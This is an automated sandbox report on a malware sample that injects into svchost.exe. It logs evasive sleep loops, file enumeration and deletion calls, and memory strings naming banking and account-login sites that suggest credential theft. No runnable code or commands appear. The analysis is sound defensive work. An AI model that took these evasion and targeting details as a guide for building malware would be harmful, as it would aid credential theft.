Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 7854 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 2001 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\DSD876543456780000.exe API coverage: 4.0 %
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe API coverage: 4.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5704 Thread sleep count: 1746 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5704 Thread sleep count: 8107 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599341s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598796s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598686s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598573s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598340s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598124s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597568s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597323s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597203s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -597093s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596984s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596875s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596765s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596546s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596437s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596325s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596218s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -596000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595890s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -595015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -594906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -594796s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7092 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6968 Thread sleep count: 7854 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6968 Thread sleep count: 2001 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598998s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598724s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598263s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -598047s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597938s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597266s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596594s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596141s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595702s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595594s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595141s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594813s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594688s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594563s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6976 Thread sleep time: -594344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C5DBBE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C2C2A2 FindFirstFileExW, 0_2_00C2C2A2
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C668EE FindFirstFileW,FindClose, 0_2_00C668EE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C6698F
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C5D076
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C5D3A9
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C69642
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C6979D
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C69B2B
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C65C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C65C97
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00ECDBBE
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E9C2A2 FindFirstFileExW, 2_2_00E9C2A2
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED68EE FindFirstFileW,FindClose, 2_2_00ED68EE
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_00ED698F
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00ECD076
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00ECD3A9
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00ED9642
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00ED979D
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00ED9B2B
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED5C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00ED5C97
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BF42DE
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599341 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598686 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598573 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598340 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597568 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597323 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596325 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598998 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598724 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598263 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595702 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594563 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594344 Jump to behavior
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcae9abfa21153<
Source: svchost.exe, 00000003.00000002.4471617531.0000000003054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/trackingProfile>
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
